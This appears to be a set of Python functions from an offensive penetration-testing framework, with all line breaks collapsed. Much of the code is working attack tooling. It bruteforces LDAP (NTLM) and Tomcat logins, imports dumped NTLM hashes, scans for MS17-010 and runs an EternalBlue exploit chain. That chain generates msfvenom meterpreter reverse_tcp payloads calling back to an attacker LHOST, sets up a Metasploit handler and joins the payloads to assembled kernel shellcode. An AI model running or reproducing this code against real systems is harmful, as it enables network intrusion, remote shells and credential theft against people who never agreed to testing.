def main(): hs = HostSearch() arg = argparse.ArgumentParser(parents=[hs.argparser], conflict_handler='resolve') arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true") arg.add_argument('-a', '--add', help="Add a new range", action="store_true") arguments = arg.parse_args() if arguments.add: print_notification("Adding new host") address = input("What host do you want to add? ") host = hs.id_to_object(address) print_success("Added a new host:") print_json(host.to_dict(include_meta=True)) elif arguments.count: print_line("Number of hosts: {}".format(hs.argument_count())) else: response = hs.get_hosts() for hit in response: print_json(hit.to_dict(include_meta=True))
def bruteforce(users, domain, password, host): """ Performs a bruteforce for the given users, password, domain on the given host. """ cs = CredentialSearch(use_pipe=False) print_notification("Connecting to {}".format(host)) s = Server(host) c = Connection(s) for user in users: if c.rebind(user="******".format(domain, user.username), password=password, authentication=NTLM): print_success('Success for: {}:{}'.format(user.username, password)) credential = cs.find_object(user.username, password, domain=domain, host_ip=host) if not credential: credential = Credential(username=user.username, secret=password, domain=domain, host_ip=host, type="plaintext", port=389) credential.add_tag(tag) credential.save() # Add a tag to the user object, so we dont have to bruteforce it again. user.add_tag(tag) user.save() else: print_error("Fail for: {}:{}".format(user.username, password))
def main(): rs = RangeSearch() arg = argparse.ArgumentParser(parents=[rs.argparser], conflict_handler='resolve') arg.add_argument('-c', '--count', help="Only show the number of results", action="store_true") arg.add_argument('-a', '--add', help="Add a new range", action="store_true") arguments = arg.parse_args() if arguments.add: print_notification("Adding new range") range_str = input("What range do you want to add? ") r = rs.id_to_object(range_str) print_success("Added a new range:") print_json(r.to_dict(include_meta=True)) elif arguments.count: print_line("Number of ranges: {}".format(rs.argument_count())) else: response = rs.get_ranges() for hit in response: print_json(hit.to_dict(include_meta=True))
def pipe_worker(pipename, filename, object_type, query, format_string, unique=False): """ Starts the loop to provide the data from jackal. """ print_notification("[{}] Starting pipe".format(pipename)) object_type = object_type() try: while True: uniq = set() # Remove the previous file if it exists if os.path.exists(filename): os.remove(filename) # Create the named pipe os.mkfifo(filename) # This function will block until a process opens it with open(filename, 'w') as pipe: print_success("[{}] Providing data".format(pipename)) # Search the database objects = object_type.search(**query) for obj in objects: data = fmt.format(format_string, **obj.to_dict()) if unique: if not data in uniq: uniq.add(data) pipe.write(data + '\n') else: pipe.write(data + '\n') os.unlink(filename) except KeyboardInterrupt: print_notification("[{}] Shutting down named pipe".format(pipename)) except Exception as e: print_error("[{}] Error: {}, stopping named pipe".format(e, pipename)) finally: os.remove(filename)
def new_range(self, ip_range): """ Function called when a new range was seen """ if not ip_range in self.ip_ranges: self.ip_ranges.add(ip_range) doc = self.rs.id_to_object(ip_range) doc.add_tag('sniffer') doc.save() print_success("New ip range: {}".format(ip_range))
def new_ip(self, ip): """ Function called when a new IP address was seen """ if not ip in self.ip_list: self.ip_list.add(ip) host = self.hs.id_to_object(ip) host.add_tag('sniffer') host.save() print_success("New ip address: {}".format(ip))
def nmap_smb_vulnscan(): """ Scans available smb services in the database for smb signing and ms17-010. """ service_search = ServiceSearch() services = service_search.get_services(ports=['445'], tags=['!smb_vulnscan'], up=True) services = [service for service in services] service_dict = {} for service in services: service.add_tag('smb_vulnscan') service_dict[str(service.address)] = service nmap_args = "-Pn -n --disable-arp-ping --script smb-security-mode.nse,smb-vuln-ms17-010.nse -p 445".split( " ") if services: result = nmap(nmap_args, [str(s.address) for s in services]) parser = NmapParser() report = parser.parse_fromstring(result) smb_signing = 0 ms17 = 0 for nmap_host in report.hosts: for script_result in nmap_host.scripts_results: script_result = script_result.get('elements', {}) service = service_dict[str(nmap_host.address)] if script_result.get('message_signing', '') == 'disabled': print_success("({}) SMB Signing disabled".format( nmap_host.address)) service.add_tag('smb_signing_disabled') smb_signing += 1 if script_result.get('CVE-2017-0143', {}).get('state', '') == 'VULNERABLE': print_success("({}) Vulnerable for MS17-010".format( nmap_host.address)) service.add_tag('MS17-010') ms17 += 1 service.update(tags=service.tags) print_notification( "Completed, 'smb_signing_disabled' tag added to systems with smb signing disabled, 'MS17-010' tag added to systems that did not apply MS17-010." ) stats = { 'smb_signing': smb_signing, 'MS17_010': ms17, 'scanned_services': len(services) } Logger().log( 'smb_vulnscan', 'Scanned {} smb services for vulnerabilities'.format( len(services)), stats) else: print_notification("No services found to scan.")
def exploit(self): """ Starts the exploiting phase, you should run setup before running this function. if auto is set, this function will fire the exploit to all systems. Otherwise a curses interface is shown. """ search = ServiceSearch() host_search = HostSearch() services = search.get_services(tags=['MS17-010']) services = [service for service in services] if len(services) == 0: print_error("No services found that are vulnerable for MS17-010") return if self.auto: print_success("Found {} services vulnerable for MS17-010".format( len(services))) for service in services: print_success("Exploiting " + str(service.address)) host = host_search.id_to_object(str(service.address)) system_os = '' if host.os: system_os = host.os else: system_os = self.detect_os(str(service.address)) host.os = system_os host.save() text = self.exploit_single(str(service.address), system_os) print_notification(text) else: service_list = [] for service in services: host = host_search.id_to_object(str(service.address)) system_os = '' if host.os: system_os = host.os else: system_os = self.detect_os(str(service.address)) host.os = system_os host.save() service_list.append({ 'ip': service.address, 'os': system_os, 'string': "{ip} ({os}) {hostname}".format(ip=service.address, os=system_os, hostname=host.hostname) }) draw_interface(service_list, self.callback, "Exploiting {ip} with OS: {os}")
def parse_file(filename): cs = CredentialSearch() us = UserSearch() print_notification("Processing {}".format(filename)) if not os.path.isfile(filename): print_error("Given path is not a file, skipping...") return pattern = r"\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" result = re.findall(pattern, filename) ip = '' if len(result): ip = result[0] print_notification("Host IP seems to be {}".format(ip)) else: print_error("IP could not be obtained from the filename, skipping...") return with open(filename, 'r') as f: data = f.readlines() data = [d.strip() for d in data] count = 0 print_notification("Importing {} credentials".format(len(data))) for line in data: s = line.split(':') if len(s) == 7: username = s[0] jackal_user = us.id_to_object(username) jackal_user.add_tag("secretsdump_import") jackal_user.save() lm = s[2] nt = s[3] secret = lm + ":" + nt credential = cs.find_object(username=username, secret=secret, host_ip=ip) if not credential: credential = Credential(secret=secret, username=username, type='ntlm', host_ip=ip, port=445) credential.add_tag("secretsdump_import") credential.save() count += 1 else: print_error("Malformed data:") print_error(line) if count > 0: print_success("{} credentials imported".format(count)) else: print_error("No credentials imported")
def import_nmap(result, tag, check_function=all_hosts, import_services=False): """ Imports the given nmap result. """ host_search = HostSearch(arguments=False) service_search = ServiceSearch() parser = NmapParser() report = parser.parse_fromstring(result) imported_hosts = 0 imported_services = 0 for nmap_host in report.hosts: if check_function(nmap_host): imported_hosts += 1 host = host_search.id_to_object(nmap_host.address) host.status = nmap_host.status host.add_tag(tag) if nmap_host.os_fingerprinted: host.os = nmap_host.os_fingerprint if nmap_host.hostnames: host.hostname.extend(nmap_host.hostnames) if import_services: for service in nmap_host.services: imported_services += 1 serv = Service(**service.get_dict()) serv.address = nmap_host.address service_id = service_search.object_to_id(serv) if service_id: # Existing object, save the banner and script results. serv_old = Service.get(service_id) if service.banner: serv_old.banner = service.banner # TODO implement # if service.script_results: # serv_old.script_results.extend(service.script_results) serv_old.save() else: # New object serv.address = nmap_host.address serv.save() if service.state == 'open': host.open_ports.append(service.port) if service.state == 'closed': host.closed_ports.append(service.port) if service.state == 'filtered': host.filtered_ports.append(service.port) host.save() if imported_hosts: print_success("Imported {} hosts, with tag {}".format( imported_hosts, tag)) else: print_error("No hosts found") return {'hosts': imported_hosts, 'services': imported_services}
def modify_input(): """ This functions gives the user a way to change the data that is given as input. """ doc_mapper = DocMapper() if doc_mapper.is_pipe: objects = [obj for obj in doc_mapper.get_pipe()] modified = modify_data(objects) for line in modified: obj = doc_mapper.line_to_object(line) obj.save() print_success("Object(s) successfully changed") else: print_error("Please use this tool with pipes")
def main(): print_notification("Importing cme") home = expanduser('~') cme_workspaces_dir = join(home, '.cme', 'workspaces') if exists(cme_workspaces_dir): print_success("Found cme directory") workspaces = os.listdir(cme_workspaces_dir) for workspace in workspaces: workspace_path = join(cme_workspaces_dir, workspace) databases = os.listdir(workspace_path) for database in databases: print_notification("Importing {}".format(database)) database_path = join(workspace_path, database) import_database(database_path)
def modify_data(data): """ Creates a tempfile and starts the given editor, returns the data afterwards. """ with tempfile.NamedTemporaryFile('w') as f: for entry in data: f.write(json.dumps(entry.to_dict( include_meta=True), default=datetime_handler)) f.write('\n') f.flush() print_success("Starting editor") subprocess.call(['nano', '-', f.name]) with open(f.name, 'r') as f: return f.readlines()
def add_tag(): """ Obtains the data from the pipe and appends the given tag. """ if len(sys.argv) > 1: tag = sys.argv[1] doc_mapper = DocMapper() if doc_mapper.is_pipe: count = 0 for obj in doc_mapper.get_pipe(): obj.add_tag(tag) obj.update(tags=obj.tags) count += 1 print_success("Added tag '{}' to {} object(s)".format(tag, count)) else: print_error("Please use this script with pipes") else: print_error("Usage: jk-add-tag <tag>") sys.exit()
def brutefore_passwords(ip, url, credentials, service): """ Bruteforce function, will try all the credentials at the same time, splits the given credentials at a ':'. """ auth_requests = [] for credential in credentials: split = credential.strip().split(':') username = split[0] password = '' if len(split) > 1: password = split[1] auth_requests.append(grequests.get(url, auth=(username, password))) results = grequests.map(auth_requests) for result in results: if result and result.status_code == 200: creds = result.request.headers['Authorization'].split(' ')[1] creds = base64.b64decode(creds).decode('utf-8') creds = creds.split(':') print_success("Found a password for tomcat: {0}:{1} at: {2}".format( creds[0], creds[1], url)) credential = Credential(secret=creds[1], username=creds[0], type='plaintext', access_level='administrator', service_id=service.id, host_ip=ip, description='Tomcat') credential.save()
def check_service(service): """ Connect to a service to see if it is a http or https server. """ # Try HTTP service.add_tag('header_scan') http = False try: result = requests.head('http://{}:{}'.format(service.address, service.port), timeout=1) print_success("Found http service on {}:{}".format( service.address, service.port)) service.add_tag('http') http = True try: service.banner = result.headers['Server'] except KeyError: pass except (ConnectionError, ConnectTimeout, ReadTimeout, Error): pass if not http: # Try HTTPS try: result = requests.head('https://{}:{}'.format( service.address, service.port), verify=False, timeout=3) service.add_tag('https') print_success("Found https service on {}:{}".format( service.address, service.port)) try: service.banner = result.headers['Server'] except KeyError: pass except (ConnectionError, ConnectTimeout, ReadTimeout, Error): pass service.save()
def import_domaindump(): """ Parses ldapdomaindump files and stores hosts and users in elasticsearch. """ parser = argparse.ArgumentParser( description= "Imports users, groups and computers result files from the ldapdomaindump tool, will resolve the names from domain_computers output for IPs" ) parser.add_argument("files", nargs='+', help="The domaindump files to import") arguments = parser.parse_args() domain_users_file = '' domain_groups_file = '' computer_count = 0 user_count = 0 stats = {} for filename in arguments.files: if filename.endswith('domain_computers.json'): print_notification('Parsing domain computers') computer_count = parse_domain_computers(filename) if computer_count: stats['hosts'] = computer_count print_success("{} hosts imported".format(computer_count)) elif filename.endswith('domain_users.json'): domain_users_file = filename elif filename.endswith('domain_groups.json'): domain_groups_file = filename if domain_users_file: print_notification("Parsing domain users") user_count = parse_domain_users(domain_users_file, domain_groups_file) if user_count: print_success("{} users imported".format(user_count)) stats['users'] = user_count Logger().log( "import_domaindump", 'Imported domaindump, found {} user, {} systems'.format( user_count, computer_count), stats)
def zone_transfer(address, dns_name): """ Tries to perform a zone transfer. """ ips = [] try: print_notification("Attempting dns zone transfer for {} on {}".format(dns_name, address)) z = dns.zone.from_xfr(dns.query.xfr(address, dns_name)) except dns.exception.FormError: print_notification("Zone transfer not allowed") return ips names = z.nodes.keys() print_success("Zone transfer successfull for {}, found {} entries".format(address, len(names))) for n in names: node = z[n] data = node.get_rdataset(dns.rdataclass.IN, dns.rdatatype.A) if data: # TODO add hostnames to entries. # hostname = n.to_text() for item in data.items: address = item.address ips.append(address) return ips
def parse_ips(ips, netmask, include_public): """ Parses the list of ips, turns these into ranges based on the netmask given. Set include_public to True to include public IP adresses. """ hs = HostSearch() rs = RangeSearch() ranges = [] ips = list(set(ips)) included_ips = [] for ip in ips: ip_address = ipaddress.ip_address(ip) if include_public or ip_address.is_private: print_success("Found ip: {}".format(ip)) host = hs.id_to_object(ip) host.add_tag('dns_discover') host.save() r = str( ipaddress.IPv4Network("{}/{}".format(ip, netmask), strict=False)) ranges.append(r) included_ips.append(ip) else: print_notification("Excluding ip {}".format(ip)) ranges = list(set(ranges)) for rng in ranges: print_success("Found range: {}".format(rng)) r = rs.id_to_object(rng) r.add_tag('dns_discover') r.save() stats = {} stats['ips'] = included_ips stats['ranges'] = ranges return stats
def callback(self, event): """ Function that gets called on each event from pyinotify. """ # IN_CLOSE_WRITE -> 0x00000008 if event.mask == 0x00000008: if event.name.endswith('.json'): print_success("Ldapdomaindump file found") if event.name in ['domain_groups.json', 'domain_users.json']: if event.name == 'domain_groups.json': self.domain_groups_file = event.pathname if event.name == 'domain_users.json': self.domain_users_file = event.pathname if self.domain_groups_file and self.domain_users_file: print_success("Importing users") subprocess.Popen([ 'jk-import-domaindump', self.domain_groups_file, self.domain_users_file ]) elif event.name == 'domain_computers.json': print_success("Importing computers") subprocess.Popen(['jk-import-domaindump', event.pathname]) # Ldap has been dumped, so remove the ldap targets. self.ldap_strings = [] self.write_targets() if event.name.endswith('_samhashes.sam'): host = event.name.replace('_samhashes.sam', '') # TODO import file. print_success("Secretsdump file, host ip: {}".format(host)) subprocess.Popen(['jk-import-secretsdump', event.pathname]) # Remove this system from this ip list. self.ips.remove(host) self.write_targets()
def setup(self): """ This function will call msfvenom, nasm and git via subprocess to setup all the things. Returns True if everything went well, otherwise returns False. """ lport64 = self.port64 lport32 = self.port32 print_notification("Using ip: {}".format(self.ip)) print_notification("Generating metasploit resource file") resource = """use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set LHOST {ip} set LPORT {port64} set ExitOnSession false run -j set payload windows/meterpreter/reverse_tcp set LHOST {ip} set LPORT {port32} set ExitOnSession false run -j """.format(ip=self.ip, port64=lport64, port32=lport32) self.resource_file = os.path.join(self.datadir, 'ms17_resource.rc') with open(self.resource_file, 'w') as f: f.write(resource) print_success( "Resource file created, run the following command in msfconsole:") print_success("resource {}".format(self.resource_file)) command_64 = "msfvenom -p windows/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload32.bin".format( ip=self.ip, port=lport32, datadir=self.datadir) command_32 = "msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={ip} LPORT={port} -f raw -o {datadir}/payload64.bin".format( ip=self.ip, port=lport64, datadir=self.datadir) print_notification("Generating payloads") process = subprocess.run(command_32.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE) if process.returncode != 0: print_error("Problem with generating payload:") print_error(process.stderr) return False process = subprocess.run(command_64.split(' '), stdout=subprocess.PIPE, stderr=subprocess.PIPE) if process.returncode != 0: print_error("Problem with generating payload:") print_error(process.stderr) return False if not os.path.exists(os.path.join(self.datadir, 'MS17-010')): print_notification("Git repo was not found, cloning") process = subprocess.run( "git clone https://github.com/mwgielen/MS17-010 {dir}".format( dir=os.path.join(self.datadir, 'MS17-010')).split(' ')) if process.returncode != 0: print_error("Problems with cloning git") return False process = subprocess.run( "nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x64.asm -o {datadir}/kshell64.bin" .format(datadir=self.datadir).split(' ')) if process.returncode != 0: print_error("Problems with NASM") return False process = subprocess.run( "nasm {datadir}/MS17-010/shellcode/eternalblue_kshellcode_x86.asm -o {datadir}/kshell86.bin" .format(datadir=self.datadir).split(' ')) if process.returncode != 0: print_error("Problems with NASM") return False self.combine_files('kshell64.bin', 'payload64.bin', 'final_met_64.bin') self.combine_files('kshell86.bin', 'payload32.bin', 'final_met_32.bin') self.create_payload('final_met_32.bin', 'final_met_64.bin', 'final_combined.bin') print_notification("Combining payloads done") print_success("Setup Done") return True